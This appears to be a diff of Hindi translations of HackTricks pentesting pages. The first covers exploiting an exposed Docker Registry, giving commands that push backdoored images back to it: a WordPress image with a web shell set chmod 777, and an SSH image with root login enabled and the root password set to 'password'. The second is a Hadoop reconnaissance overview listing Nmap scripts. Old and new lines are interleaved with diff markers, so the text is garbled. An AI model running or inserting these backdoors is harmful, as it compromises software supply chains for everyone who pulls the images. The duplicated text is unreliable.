ध्यान दें कि जब आप blobs फाइलों को डाउनलोड करके डिकंप्रेस करते हैं, तो फाइलें और फोल्डर्स वर्तमान डायरेक्टरी में प्रकट होंगे। **यदि आप सभी blobs को डाउनलोड करते हैं और उन्हें एक ही फोल्डर में डिकंप्रेस करते हैं तो वे पहले से डिकंप्रेस किए गए blobs से मूल्यों को ओवरराइट कर देंगे**, इसलिए सावधान रहें। प्रत्येक blob की सटीक सामग्री का निरीक्षण करने के लिए प्रत्येक blob को अलग-अलग फोल्डर में डिकंप्रेस करना दिलचस्प हो सकता है।
ध्यान दें कि जब आप blobs फ़ाइलें डाउनलोड और डीकंप्रेस करते हैं तो वर्तमान निर्देशिका में फ़ाइलें और फ़ोल्डर्स दिखाई देंगे। **यदि आप सभी blobs डाउनलोड करके उन्हें एक ही फ़ोल्डर में डीकंप्रेस करते हैं तो यह पहले से डीकंप्रेस किए गए blobs से मानों को अधिलेखित कर देंगे**, इसलिए सावधान रहें। प्रत्येक blob को अलग फ़ोल्डर में डीकंप्रेस करना दर्शाता है कि प्रत्येक blob की सटीक सामग्री की जांच करना रोचक हो सकता है।
{% endhint %}
### docker का उपयोग करके Enumeration
### डॉकर का उपयोग करके जाँच करना
```bash
#Once you know which images the server is saving (/v2/_catalog) you can pull them
docker pull 10.10.10.10:5000/ubuntu
@ -205,10 +201,10 @@ docker run -it 10.10.10.10:5000/ubuntu bash #Leave this shell running
docker ps #Using a different shell
docker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container
```
### WordPress इमेज में बैकडोर डालना
### WordPress इमेज में बैकडोरिंग
जिस परिदृश्य में आपने एक Docker Registry को wordpress इमेज सहेजते हुए पाया है, आप उसमें बैकडोर डाल सकते हैं।\
**बैकडोर** **बनाएं**:
उस स्थिति में जहाँ आपने एक डॉकर रजिस्ट्री में एक WordPress इमेज पाई है, आप इसे बैकडोर कर सकते हैं।\
**बैकडोर** बनाएँ:
{% code title="shell.php" %}
```bash
@ -216,7 +212,7 @@ docker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container
```
{% endcode %}
**Dockerfile** बनाएं:
एक **Dockerfile** बनाएं:
{% code title="Dockerfile" %}
```bash
@ -224,30 +220,28 @@ FROM 10.10.10.10:5000/wordpress
COPY shell.php /app/
RUN chmod 777 /app/shell.php
```
{% endcode %}
**नई इमेज बनाएं**, इसे बनाया गया है यह **जांचें**, और इसे **पुश करें**:
**नया** इमेज **बनाएं**, **जांचें** कि यह बन गया है, और **पुश** करें:
```bash
docker build -t 10.10.10.10:5000/wordpress .
#Create
docker images
docker push registry:5000/wordpress #Push it
```
### SSH सर्वर इमेज में बैकडोर डालना
### SSH सर्वर इमेज में बैकडोरिंग
मान लीजिए कि आपको एक Docker Registry मिली है जिसमें SSH इमेज है और आप इसमें बैकडोर डालना चाहते हैं।\
**डाउनलोड** करें इमेज को और **चलाएं** इसे:
मान लीजिए कि आपने एक डॉकर रजिस्ट्री में एक SSH इमेज पाया है और आप इसे बैकडोर करना चाहते हैं।\
**इमेज को डाउनलोड** करें और **इसे चलाएं**:
```bash
docker pull 10.10.10.10:5000/sshd-docker-cli
docker run -d 10.10.10.10:5000/sshd-docker-cli
```
SSH इमेज से `sshd_config`ाइल निकालें:
एसएसएच इमेज से `sshd_config` फ़ाइल निकालें:
```bash
docker cp 4c989242c714:/etc/ssh/sshd_config .
```
Aur ismein badlav karein taki set ho: `PermitRootLogin yes`
और इसे सेट करने के लिए संशोधित करें: `PermitRootLogin yes`
Niche diye gaye jaise ek **Dockerfile** banayein:
निम्नलिखित जैसा एक **Dockerfile** बनाएं:
{% tabs %}
{% tab title="Dockerfile" %}
@ -256,26 +250,26 @@ FROM 10.10.10.10:5000/sshd-docker-cli
COPY sshd_config /etc/ssh/
RUN echo root:password | chpasswd
```
{% endtab %}
{% endtabs %}
**नई इमेज बनाएं**, इसे बनाया गया है यह **जांचें**, और इसे **पुश करें**:
**नया** इमेज **बनाएं**, **जांचें** कि यह बन गया है, और **पुश** करें:
```bash
docker build -t 10.10.10.10:5000/sshd-docker-cli .
#Create
docker images
docker push registry:5000/sshd-docker-cli #Push it
```
## संदर्भ
* [https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/](https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/)
<details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहत हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** ट्विटर पर **फॉलो** करें 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>

View file

@ -8,16 +8,17 @@ HackTricks का समर्थन करने के अन्य तरी
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
# **मूल जानकारी**
एपाचे हैडूप एक ओपन-सोर्स फ्रेमवर्क है जो बड़े डेटासेट को कंप्यूटर क्लस्टर के बीच वितरित स्टोरेज और प्रोसेसिंग के लिए उपयोग करता है, मुख्य रूप से स्टोरेज के लिए हैडूप वितरित फ़ाइल सिस्टम (HDFS) और प्रोसेसिंग के लिए YARN के माध्यम से मैपरेड्यूस, अपाचे स्टॉर्म, फ्लिंक, और स्पार्क जैसी अन्य एप्लिकेशन का उपयोग करता है। इन सेवाओं के साथ इंटरैक्ट करने के लिए, एक सेट के Nmap स्क्रिप्ट उपलब्ध हैं, प्रत्येक का एक विशिष्ट पोर्ट और उद्देश्य से संबंध है, हालांकि यह नोट किया गया है कि हैडूप को Metasploit फ्रेमवर्क में समर्थन की कमी है डॉक्यूमेंटेशन के समय।
**एपाचे हैडूप** एक **ओपन-सोर्स फ्रेमवर्क** है जो **कंप्यूटर क्लस्टर** के **वितरित स्टोरेज और प्रोसेसिंग** के लिए **बड़े डेटासेट** को **हस्तांतरित** करता है। यह **स्टोरेज के लिए HDFS** और **प्रोसेसिंग के लिए MapReduce** का उपयोग करता है।
दुर्भाग्य से हैडूप को **Metasploit फ्रेमवर्क में समर्थन की कमी** है डॉक्यूमेंटेशन के समय। हालांकि, आप हैडूप सेवाओं की जांच के लिए निम्नलिखित **Nmap स्क्रिप्ट** का उपयोग कर सकते हैं:
- **हैडूप के लिए Nmap स्क्रिप्ट**:
- **`hadoop-jobtracker-info (पोर्ट 50030)`**
- **`hadoop-tasktracker-info (पोर्ट 50060)`**
- **`hadoop-namenode-info (पोर्ट 50070)`**
@ -25,7 +26,7 @@ HackTricks का समर्थन करने के अन्य तरी
- **`hadoop-secondary-namenode-info (पोर्ट 50090)`**
यह महत्वपूर्ण है कि **हैडूप अपने डिफ़ॉल्ट सेटअप में प्रमाणीकरण के बिना काम करता है**। हालांकि, बेहतर सुरक्षा के लिए, HDFS, YARN, और MapReduce सेवाओं के साथ कर्बेरोस को एकीकृत करने के लिए कॉन्फ़िगरेशन उपलब्ध हैं।
महत्वपूर्ण नोट है कि **हैडूप अपने डिफ़ॉल्ट सेटअप में प्रमाणीकरण के बिना काम करता है**। हालांकि, बेहतर सुरक्षा के लिए, HDFS, YARN, और MapReduce सेवाओं को Kerberos के साथ एकीकृत करने के लिए विन्यास उपलब्ध हैं।
<details>
@ -37,6 +38,6 @@ HackTricks का समर्थन करने के अन्य तरी
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>